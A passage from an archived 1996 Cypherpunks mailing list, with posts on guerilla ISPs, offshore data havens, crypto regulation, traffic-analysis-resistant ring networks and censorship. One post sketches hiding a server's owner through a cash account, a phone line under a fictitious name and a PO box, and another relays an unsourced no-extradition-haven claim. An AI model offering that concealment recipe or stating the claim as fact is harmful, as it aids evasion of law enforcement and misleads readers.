their risk of punishment is quite low.  Particularly since if they are
worried about it, they can take many easy steps to protect themselves.

In the coming world in which millions of households have multitasking
computers with full-time highspeed connections to the nets, Java-like
applets running wild, etc; the opportunities to stash info in easily
accessible but hard to trace forms expands without limit.

I was trying to imagine over the weekend how the Feds would regulate the
Net.  Will Janet and her Storm troopers (wearing Nazi-style bucket helmets)
smash into the next meeting of the Internet Engineering Task Force and lock
everyone up or force them at gunpoint to adopt standards proposed by the
government?  And if they do, will their code be any good and will it be
accepted by enough nodes to make a difference?  Unlikely in the extreme.

Where are the pressure points where regulation can be applied?

To me, it looks like King Canute ordering back the tide.

DCF

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Wed, 3 Jan 1996 12:00:18 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <199601021341.HAA12007@dal1820.computek.net>
Message-ID: <Pine.3.89.9601021240.A25307-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Ed Carp [khijol SysAdmin] wrote:
> 
> Why isn't outer space realistic?  We already have store-and-forward 
> packet radio systems in AMSAT satellites - they usually hitch a ride up 
> with a commercial satellite.
> - --
Commercial satallites have land based corporate owners. Remember the 
success that Alabama had a few years ago pulling the plug on a New York 
based softporn tv satellite distribution system. They simply went after the 
assets of the satellite companies and got quick cooperation.

Jay Holovacs <holovacs@ios.com>
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
 (KEY id 1024/80E4AA05) email me for key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 3 Jan 1996 14:51:56 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Guerilla ISP's...
In-Reply-To: <2.2.32.19960102115836.008c6b40@panix.com>
Message-ID: <199601021849.MAA31203@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> If the processes are operating in encrypted accounts not under the control
> of the machine owner it is hard to find the machine owner liable.  In
> addition, the Feds can only afford a few prosecutions at $50-$100K each
> (Brian, if you're listening what *does* the average Federal prosecution
> cost?).  The cost of setting up servers is much lower than the cost of
> busting them.

And the servers could really be set up anonymously.  Pay cash to an ISP 
for a SLIP or PPP account, get a phone line under a ficticious name, set 
up a PO box for the (few) bills, find somewhere to set up the machine, 
and away you go...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOl+VCS9AwzY9LDxAQGFfAQArUOg/QPRluQEwJQNxx7VxhwgxrzCO91T
WRHvP71Cgb8cpYorWrHTf0xrh+ng7RtLkXaiJJd7RWmx2ggp8Tpv1sBxaAN9sgXm
lhHFlD9eHVf/q6ZsmohNTQSh7ZDav4gB2ewHwZDzTwD3stm4Q06tH6p7XUAfmGlK
iYT8dN2fHBg=
=MwEh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Wed, 3 Jan 1996 17:06:52 +0800
To: "nobody@REPLAY.COM>
Subject: RE: Guerilla Internet Service Providers
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960102125221HP007103@red-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Another suggestion: The Republic of the Seychelles. Saw an AP article on 
them over the weekend. Seems they now (since November, if I remember the 
article correctly) offer unconditional haven for anyone who has $10,000,000 
(didn't specify if in US$). No extradition, guaranteed, no matter what the 
crime, if perpetrated anywhere else in the world. Instant citizenship, no 
questions asked.

Kurt

----------
From: 	nobody@REPLAY.COM[SMTP:nobody@REPLAY.COM]
Sent: 	Monday, January 01, 1996 22:40
To: 	Cypherpunks@toad.com
Subject: 	Re: Guerilla Internet Service Providers

-----BEGIN PGP SIGNED MESSAGE-----

On 1/1/96 at 3:11 pm Lucky Green replied to Andreas Bogk about:

>>So I guess we'll need some computers in outer space, on offshore boats
>>or in well-bribed stable dictatorships.

>o Outer space: not very realistic
>o Offshore boats: see the fate of drug trafficers in international waters
>after the Coast Guard is through with them.

What about using converted freighters offshore in international waters
for storing the computers? i.e. Sameer the Wolfman Jack of Pirate Internet 
Services (tm)  

I was told that Belize is offering passports for the next two years for 
$50,000 
and that might be even less if offers were made to the government to provide 

low cost Internet access to the citizens of Belize.

http://www.belize.com/citzdoc.html

Belize has always been known as a home for pirates, A wonderful Cypherpunk
candidate for an offshore data haven!

L. Malthus


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOjOmQJo+wOswDgJAQEdGgP8CzcIf7/p1QS8yYc7uelApYLWcDUHo1AE
LHBz4kWg8bdrvWEqck1oIgY/Z+gvr88tKP3l7TDei8y+mJFoqYeSM27aE0ohvS2a
XVq7YwbGs+/CKTWJTWsyxwsQEQHyj+Ig7oY+JB76wUN9WTz9pfuwXQ7oaF4RXHcf
WqFOXM6ogMA=
=0UFR
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 3 Jan 1996 15:09:12 +0800
To: cypherpunks@toad.com
Subject: CIA intelligence info
Message-ID: <199601022117.NAA13088@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


some interesting info on apparent efforts by the CIA spooks to get into
economic espionage and be more "user friendly" .. (blecch)

------- Forwarded Message
From: "Ron Pappas" <rpappas@ix.netcom.com>
Date: Sun, 31 Dec 1995 18:17:52 +0000
Subject: Intelligence Anyone?

FRM: Ron Pappas
FOR: All

- - -=> Quoting Paul McGinnis <=-

April 12, 1994 --           the CIA released a document in February
1994 called "A Consumer's Guide to Intelligence". My copy arrived today,
so I will provide a review for interested parties. 

This item has a slick marketing feel to it, similar to that of a prospectus
for a new stock or something given to prospective car buyers. It's even
printed on glossy paper. About the only thing missing, that other marketing
documents have, is color photographs of happy employees. Apparently, in
this era of shrinking budgets, it was prepared to "sell" the Intelligence
Community to various government officials. In fact, inside the front cover,
is the statement "This publication is prepared for the use of US government
officials, and the format, coverage, and content are designed to meet
their specific requirements."

So, what's the content like? It discusses what various intelligence
agencies actually do, types of intelligence, how intelligence is collected
(helpful tip: if you have just come back from an exotic foreign country,
the U.S. government would really like to have a friendly chat with you...)
and the reports that can be provided to policymakers. For example, if you
have enough political clout, you can get a free subscription to the
following (quoted verbatim from page 23 of the CIA publication):
  Defense Intelligence Agency Current Assessments
  _______________________________________________
  A tabloid product that provides a brief and timely assessment of an
  ongoing military or military-related situation or recent development
  considered highly significant to national-level decisionmakers.
Given the word "tabloid" one wonders if it features lurid New York Post
style headlines, such as "Serbian general's secret Bosnian girlfriend"...

There are a few surprises though. For example, among current large consumers
of intelligence information, it lists the Department of Agriculture and
the Federal Aviation Administration (FAA). They also discuss the rarely
mentioned MASINT field (Measurements and Signatures Intelligence). MASINT
involves using scientists and engineers to study other characteristics
of intelligence information gathered. For example, although it is not
stated in this publication, it is believed that MASINT specialists studied
the spectral characteristics of Soviet rocket exhausts to determine the
fuel mixture used in the rocket.

How does one obtain a copy of this document? It is available for $12.50
to addresses in the U.S., Canada, and Mexico, and $25.00 elsewhere. (There
was an error in the NTIS database entry I posted earlier which indicated the
price was $17.50). Also, you need to add $3.00 for postage per order (not
per copy) in the U.S., Canada and Mexico, and $4.00 for postage elsewhere.
To order, make checks payable to NTIS, and request item # PB93-928021 from
  U.S. Department of Commerce
  National Technical Information Service
  Springfield, VA  22161
  phone (703) 487-4650
Ask for a free copy of their catalog of products and services.

So, is it worth ordering? If you are interested in intelligence, I recommend
this publication. Also, it might be a good thing to leave laying around on
your coffee table if you have "politically correct" visitors... 

Paul McGinnis / TRADER@cup.portal.com

- - ------------------------------------------------
(This file was found elsewhere on the Internet and uploaded to the
Patriot FTP site by S.P.I.R.A.L., the Society for the Protection of
Individual Rights and Liberties. E-mail alex@spiral.org)
Peace,

Pap...

The College Board 864.878.7340  FIDO - 1:3639/60

- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jan 1996 17:09:24 +0800
To: cypherpunks@toad.com
Subject: How the Gov't. "Deputizes" Corporations to Enforce Laws
Message-ID: <ad0ec8f600021004401e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 AM 1/2/96, Felix Lee wrote:

>compare with software piracy.  when was the last time a kid in your
>neighborhood was busted for unlicensed copying of software?  and
>software is big business, lots of suits and $$$.  they can try to make
>disassemblers illegal, but it's not likely to succeed.

Though I generally agree with the point that laws can and are skirted (I've
argued this too many time myself to repeat it again here), this point about
software piracy needs to be critiqued.

The software piracy laws are usually targetted at _corporations_. The
Software Publisher's Association has very effectively caused corporations
to launch extensive anti-piracy programs (including the very audits of disk
drives that so many on this list think is a violation of their human
rights).

As with the drug laws, which corporations have been "deputized" (=
threatened) to enforce via drug testing, urine tests, random searches, etc.

Whit Diffie has been making this point for several years, that the drug
laws may not be very enforceable on street corners, but by threatening
corporations with loss of contracts, shutdown of plants, seizure of assets,
and even criminal prosecution if they fail to take approved steps to create
a "drug-free workplace," the long arm of the law is supplemented by
corporate enforcement. The "War on Drugs," "Just Say No," and "FooCorp
Maintains a Drug-Free Workplace" sorts of campaigns.

(When I was at Intel, 1974-86, nobody cared what drugs were used in the
evenings, weekends, etc., so long as one did not come to work stoned or
otherwise impaired. Now, like most other large corporations, there are
posters up on the walls with childish slogans about the dangers of
"substance abuse," extensive drug tests for new employees (not sure about
existing employees), employee training seminars devoted to substance abuse,
etc. Not because Andy Grove sees a drug problem, but because of the drum
beat of "Just Say No!" hysteria and the threats of government sanctions.
Corporations have been enlisted into the War on (Some) Drugs.)

The same applies to software piracy. Nobody expects casual, personal
copying to stop, but anyone in a company can anonymously narc out the
company to the SPA and law enforcement. The SPA and cops may then decide to
"make an example" out of the company, launching raids, detailed audits of
all machines, and the levying of huge fines for copies of software which
are thought to be illegal. (This course of action seems to happen regularly
in the Bay Area...the press is usually invited along or tipped off, and the
evening news shows some company shut down for a day as SPA and law
enforcement agents carry off dozens of bootlegged copies of WordPerfect and
Excel.)

The drug and software piracy cases give us some hints about how
restrictions on "illegal crypto" are likely to be enforced.

The "casual user" will not be targetted. He can pretty much expect to see
no effective enforcement. However, the Lockheeds and Apples will face
sanctions, loss of contracts, asset forfeiture, etc., unless they take
"positive steps" to ensure that PGP, BlackNet, non-GAKked crypto, anonymous
remailers, and other illegal programs are not being used on their systems.
This will entail packet sniffers checking for the usual signs, audits of
employee workstations and PCs, posted policies on "cybersubstance abuse"
and its dangers, etc. (I'm only slightly joking here.)

While this will still not stop all crypto use--just as tax evasion
continues, drug use is rampant, and software piracy is done to some extent
by nearly everyone--it will halt certain types of rapid deployment, pushing
crypto use to the fringes and away from mainstream use. It will terrorize
the Intels and Merrill Lynches of the country into being enforcers of the
laws.

This is how things are being done in these waning years of the 20th Century.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 3 Jan 1996 15:24:44 +0800
To: cypherpunks@toad.com
Subject: New year's letter picked up by Netly News
Message-ID: <199601022206.OAA27617@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi cypherpunks,

   In case anyone missed it the first time, or just prefers to see it
in HTML (with URLs), my new year's eve letter got picked up by the
Netly News, Josh Quittner's daily column on Time's Pathfinder Web
site.

http://pathfinder.com/@@noje*HGS0AMAQNl0/Netly/nnhome.html

   The second part will run tomorrow.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <cg@bofh.toad.com (none)>"Cees de Groot" <C.deGroot@inter.nl.net>
Date: Wed, 3 Jan 1996 11:59:05 +0800
To: raph@c2.org
Subject: Re: A great time to be a cypherpunk
In-Reply-To: <199512312146.NAA22286@infinity.c2.org>
Message-ID: <199601021319.OAA01013@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    Here's a subjective top 5 list:
> 
6. Premail 0.42alpha, by Raph. I know got elm+pgp sending its mail through
   premail, making elm a all-in-one solution for signing, encryption,
   decryption, nymming and all types of remailing. Perfect job!


-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 16:11:53 +0800
To: ecarp@netcom.com
Subject: Re: Guerilla ISP's...
Message-ID: <v02120d00ad0f63022adb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 1/2/96, Ed Carp [khijol SysAdmin] wrote:

>And the servers could really be set up anonymously.  Pay cash to an ISP
>for a SLIP or PPP account, get a phone line under a ficticious name, set
>up a PO box for the (few) bills, find somewhere to set up the machine,
>and away you go...

Only to have the box impounded within a few days after going on-line. A
very costly and likely short lived hobby.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 3 Jan 1996 23:03:15 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Guerilla ISP's...
In-Reply-To: <2.2.32.19960102115836.008c6b40@panix.com>
Message-ID: <Pine.BSF.3.91.960102150318.895B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Duncan Frissell wrote:

> At 06:49 PM 1/1/96 -0800, Lucky Green wrote:
> 
> >That is called a conspiracy. The consequence is that all machines involved
> >will be confiscated and their respective owners jailed.
> >
> >
> >-- Lucky Green <mailto:shamrock@netcom.com>
> >   PGP encrypted mail preferred.
> 
> If the processes are operating in encrypted accounts not under the control
> of the machine owner it is hard to find the machine owner liable.  In
> addition, the Feds can only afford a few prosecutions at $50-$100K each
> (Brian, if you're listening what *does* the average Federal prosecution
> cost?).  The cost of setting up servers is much lower than the cost of

I am listening, but don't know the marginal cost of such a prosecution.  
It is really more a reallocation of already existing resources.  For 
example, we could let the state prosecutors handle a bank robbery or 
three while we protect the unwary innocent from encryption!

EBD

BTW our office collects more every year (from fines, foreclosures, 
bankruptcies, affirmative civil cases, etc. etc.) than our total office 
budget.  We make money -- so why am I unpaid this week!   :-)


> busting them.
> 
> DCF
> 
> "RIP -- the Interstate Commerce Commission.  Dead Jan 1 at the age of
> 120(?).  The first Federal regulatory agency.  One down, thousands to go."
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 3 Jan 1996 15:33:19 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Shut 'er down
Message-ID: <2.2.32.19960102203509.006bed68@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:06 PM 1/2/96 -0500, Brian Davis wrote:

>BTW our office collects more every year (from fines, foreclosures, 
>bankruptcies, affirmative civil cases, etc. etc.) than our total office 
>budget.  We make money -- so why am I unpaid this week!   :-)

The courts cost too though.  Also there's your share of general government
overhead.  You may cover variable direct costs but perhaps not indirect and
fixed costs.

I take it you are unpaid but working.  Couldn't we reverse the process and
pay you not to work?  Sort of like protection money.  It would be worth it I
think.

DCF

"Some of my best friends are public employees but I wouldn't want my sister
to marry one.  She needs someone with a steady income and future prospects."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 3 Jan 1996 23:03:19 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Why Net Censorship Doesn't Work
Message-ID: <v02120d03ad0f6483762e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I think that there is still a substantial possibility that many kinds
of expression will be marginalized and hard to access for a great many
users.

One of my co-workers has pointed out that the need for something as
simple as a helper application for Netscape loses about 90% of his
audience. By simply making it rather more difficult for people to
chat about some things, governments can effectively push such things
out of the way of all but the most determined readers.

This is actually one of those odd Laffer-curve-like phenomena, where
as long as the expression isn't too inherently desirable, government
restrictions can be somewhat effective, but the more tightly they try to
control things, the more likely the are to lose, as there will be more
and more desirable content outside the sanctioned sphere of activity.
Consequently, I was much happier to see the "indecency" standard get
passed instead of the "harmful" standard, as the former will push far
more content into the "gray" area of the net, which will encourage
development and adoption of appropriate tools.

A quote from Star Wars (which I'm just now incorporating into my .sig)
was just echoed back to me in a letter from a chap I spoke with from
the Australian Office of Strategic Crime Assessment, as encapsulating
what he got out of a rather long chat we had when he was passing through
the Bay Area last month. Here it is:

------                                                           , ------
Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
cman@communities.com    the more systems will slip through your fingers."
cman@best.com                                             --Princess Leia






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 3 Jan 1996 17:15:44 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <Pine.SUN.3.91.960102092744.4338J-100000@goya>
Message-ID: <9FP4gD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Mandl <dmandl@bear.com> writes:
> The number of people who drank booze when Prohibition began dwarfs the
> number of people who want access to "controlled" information on the
> net today.  Most people still don't even understand what the net is.
> They're two completely different situations.  Also, the powers that be
> have much better reasons for killing the net than they had for banning
> booze.

Also, the powers that be could have wiped out bootlegging if they really
wanted to -- by draconian means.  Corrupt politicians at various levels chose
to let the laws be violated and to accept the bribes.

There's much less money involved in the distribution of "undesirable"
information.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Wed, 3 Jan 1996 17:33:59 +0800
To: "cypherpunks@toad.com>
Subject: Inter-Patch Voice Network
Message-ID: <199601030419.UAA11507@Chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

Cpunx,

This may be old hat, but now that PGPfone is available, why
don't we start an "Inter-Patch" Network using PGP and ecash?

Here are features to consider:

 * Computer users generate pre-paid phone cards for non-geeks.
 * Rate is say, 2 cents per minute, for near-real-time voice.
 * "Voice Mail" service is not subject to telco utility regs.
 * PIN#s can be changed by users, who can also confirm value.
 * Thus a user can sell remaining time on a card to others.
 * A local participant to the target number is selected.
 * Ecash is instantly delivered in exchange for communications.
 * Perhaps a 50 percent split, 1 cent per minute for example.
 * Bad participants are removed from the network.

Kent
- --
J. Kent Hastings
Assistant Director of The Agorist Institute
zeus@pinsight.com, http://www.pinsight.com/~zeus/agorist/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOn0hTTxxI221vktAQHs3AQAj/uI2xYGSfE9iSVttCncBrS7yDAUaecX
+s1U8zF29zx4a/zq6yUOOJncxS7GWXavUhNLcjuruH7f9tHO1Sam8XcT59rwVlvv
P+xnrV/NwaDW0q+TxWjnNhVgTJePC6Hq+6bLRiod+hOTuawkJ3vx50CmDoEKC1Fk
HrNqiRLzNQc=
=O3Bo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jan 1996 11:52:35 +0800
To: jim bell <flee@teleport.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601030331.TAA27550@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:51 1/2/96 -0800, jim bell wrote:
>At some point, individual urban and suburban blocks could easily be
>"guerilla re-wired" for ISP access without serious trenching, etc.  The
>phoneco would still be involved, but in a far lower-profit mode, as the
>supplier of a single T1 to a multi-block area.  

Don't forget about infrared to cross public rights-of-way.  I have long
dreamed of tossing a piece of coax over the fence to my neighbors.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 3 Jan 1996 12:01:46 +0800
To: gbroiles@darkwing.uoregon.edu
Subject: [local] Portland OR Cypherpunks meeting
Message-ID: <2.2.32.19960103034409.0091ae54@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


It looks like the Portland Cypherpunks meeting is going to happen.  The
meeting plans are not set in stone.  (I am still trying to make certain that
the maximum amount of people can attend.)

The current plans:

Location:       The Habit Internet Cafe
                21st and Clinton 
                Portland Or
Time:           5:23pm (Discordian Standard time)
Date:           January 20th, 1996

There are machines and Internet connections available at the site.  I am
concidering adding an IRC channel for virtual Cypherpunk attendance.
(Encrypted IRC anyone?)

Planned activities include keysigning, discussing various issues and
projects of the day, drinking lots of coffee, and whatever else we can come
up with.  (A Detwiller Doom patch?)

No video cammeras, regualer cameras, and/or other soul stealing devices will
be allowed on the premises.  (Many of the people attending have pork and
pork-substitute related alergies.)

A more detailed porting will occur in a couple of days.

For more information, complaints, flames, etc., just send me e-mail.

Thanks!

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
"Governments are potholes on the Information Superhighway." - Not TCMay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 11:59:17 +0800
To: Jon Lasser <tcmay@got.net>
Subject: Re: Foiling Traffic Analysis
Message-ID: <v02120d01ad0fa95f21ee@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:02 1/2/96, Jon Lasser wrote:

>When the group of packets arrives at a given station, it replaces its
>current encrypted packet with a new packet; if it doesn't have any new
>packets to send, it puts up a garbage packet that is indistinguishable
>from a normal packet. It then scans all the other packets and attempts to
>decrypt them with its private key. Any it can read, it does; all the
>packets are forwarded to the next station in the ring.

All participants in this network are clearly guilty of conspiracy. Their
assets will be confiscated under RICO. As Brian mentioned, the law
enforcement agencies are creating a surplus by such seizures. The costs
associated with more prosecutions are more than offset by the revenue
generated. Your computer will make a welcome addition to their budget.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Wed, 3 Jan 1996 12:22:55 +0800
To: cypherpunks@toad.com
Subject: Re: Risks of writing a remailer
In-Reply-To: <199601022345.AAA04572@utopia.hacktic.nl>
Message-ID: <m0tXKOW-000ungC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous (nobody@flame.alias.net) wrote:
>   What are the legal risks of writing (and releasing) a remailer,
>  and what steps can an author go to to minimise any unwanted (legal
>  or civil) attention ?

I've never heard of anyone complaining that I wrote a remailer.  A few
were upset at my running a remailer, but nobody every complained that the
software was available.

As far as minimizing attention to yourself, you obviously know how to
post anonymously.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 3 Jan 1996 22:59:57 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Foiling Traffic Analysis
In-Reply-To: <ad0ebb9d0c0210048ac9@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960102195154.11723B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Timothy C. May wrote:

> At 4:35 AM 1/2/96, Jon Lasser wrote:
> 
> >The potential for traffic analysis is the danger here. If an "FBI
> >International Data Laundering Expert" testifies in court that said data
> >came from a site known to be frequented solely by so-and-sos, all the
> >strong crypto in the world won't stop the average jury from convicting you.
> >
> >Carl Ellison (among others, I'm sure) has suggested various means of
> >foiling traffic analysis among a group of trusted conspirators, using a
> >token-ring-like routing scheme. I'm not completely convinced that it's
> >robust enough, but a variation on it is probably adaptable.
> 
> How does this differ from Dining Cryptographers approaches?

Totally different from a DC-Net, as far as I understand DC-Nets (I think 
I do, but Applied Crypto's in my dorm, and I'm at home, so I can't check)

In this approach, computers are organized in "rings"; each computer in a 
given ring always has an encrypted packet in circulation.

When the group of packets arrives at a given station, it replaces its 
current encrypted packet with a new packet; if it doesn't have any new 
packets to send, it puts up a garbage packet that is indistinguishable 
from a normal packet. It then scans all the other packets and attempts to 
decrypt them with its private key. Any it can read, it does; all the 
packets are forwarded to the next station in the ring.

By the time the next set of packets arrives, all have been replaced; the 
station is unable to determine either the source or the destination of 
any given packet. Routing between loops is done by routers, which are 
computers on multiple loops. Perhaps all machines are on multiple loops 
and serve as routers.

I'm not sure about traffic analysis in cases where Mallet controls a 
significant portion of the network; while this is unlikely, it must be 
considered.

Any significant inconsistancies are probably mine...
Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Wed, 3 Jan 1996 17:24:59 +0800
To: cypherpunks@toad.com
Subject: RE: Why Net Censorship Doesn't Work
Message-ID: <960102200837.4460036b@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


DCF wrote:
>Thought control is a very difficult task.  It always has been.  The
>Inquisition,  Nazi Germany, the Soviet Union, and the People's Republic of
>China tried but three of the four are no longer with us.  Short of
>totalitarian controls, thought controls will be ineffective.  And
>totalitarian controls are difficult to impose these days.

  While thought control is difficult, one cannot ignore the damage done
  trying to do it. All of the above examples were expensive in terms of
  human suffering and death toll for long periods of time. The controls
  were effective for some time with long periods for recovery. The facists
  may lose in the end but the price of victory is very high. I fear the
  current and future efforts at controls will be costly no matter what
  the outcome.

                          bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 3 Jan 1996 10:22:22 +0800
To: pmonta@qualcomm.com (Peter Monta)
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601030140.RAA03047@mage.qualcomm.com>
Message-ID: <199601030209.UAA27249@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > It seems to me that phone line costs are turning into a floor price for
> > Internet access, when they shouldn't really be.  The main asset telephone
> > companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
> > park that allows you to run  your own dedicated copper pairs, and you've
> > bypassed $25/month/line business phone line charges. 
> > 
> > At some point, individual urban and suburban blocks could easily be
> > "guerilla re-wired" for ISP access without serious trenching, etc.  The
> > phoneco would still be involved, but in a far lower-profit mode, as the
> > supplier of a single T1 to a multi-block area.  
> 
> For the "last mile" to the ISP user, wireless could be a better bet.
> Have antenna, will surf.

I can easily visualize mobile and portable systems linking to an ISP, 
downloading email via encrypted POP/UUCP/whatever, using itinerant 2m or 
450 MHz frequencies.  A mobile system connects to any ISP, gets a login: 
prompt, enters "xyz@host.domain", gets thrown into a POP session on 
host.domain, uploads/downloads, then disconnects.  All it would really 
require is implementing "exec rlogin -l xyz host.domain" into getty (a 
very simple patch) and suitable crypto protocols...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOnlPyS9AwzY9LDxAQHJ2QP7BhISrKa3zgNs7gsGaTdp3JLj39ER6mJ1
